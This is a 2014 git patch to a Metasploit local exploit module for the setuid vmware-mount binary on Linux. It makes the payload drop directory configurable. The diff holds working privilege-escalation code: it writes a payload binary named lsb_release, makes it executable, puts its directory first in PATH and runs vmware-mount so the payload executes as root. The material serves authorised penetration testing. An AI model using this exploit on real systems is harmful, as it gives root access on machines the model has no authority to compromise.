From 25ecf73d7d472a84fa5c50d6623c23203e585e0f Mon Sep 17 00:00:00 2001
From: Rasta Mouse <rasta@wi-fu.co.uk>
Date: Thu, 27 Nov 2014 17:12:37 +0000
Subject: [PATCH] Add configurable directory, rather than relying on the
 session working directory.

---
 modules/exploits/linux/local/vmware_mount.rb | 13 ++++++++-----
 1 file changed, 8 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb
index 17510b7118..cd089b38b6 100644
--- a/modules/exploits/linux/local/vmware_mount.rb
+++ b/modules/exploits/linux/local/vmware_mount.rb
@@ -53,6 +53,9 @@ class Metasploit4 < Msf::Exploit::Local
         'DisclosureDate' => "Aug 22 2013"
       }
       ))
+    register_options([
+        OptString.new("WritableDir", [ true, "A directory where you can write files.", "/tmp" ]),
+      ], self.class)
   end
 
   def check
@@ -68,13 +71,13 @@ class Metasploit4 < Msf::Exploit::Local
       fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
     end
 
-    write_file("lsb_release", generate_payload_exe)
-
-    cmd_exec("chmod +x lsb_release")
-    cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
+    path = "#{datastore["WritableDir"]}"
+    write_file("#{path}/lsb_release", generate_payload_exe)
+    cmd_exec("chmod +x #{path}/lsb_release")
+    cmd_exec("PATH=#{path}:$PATH /usr/bin/vmware-mount")
     # Delete it here instead of using FileDropper because the original
     # session can clean it up
-    cmd_exec("rm -f lsb_release")
+    cmd_exec("rm -f #{path}/lsb_release")
   end
 
   def setuid?(remote_file)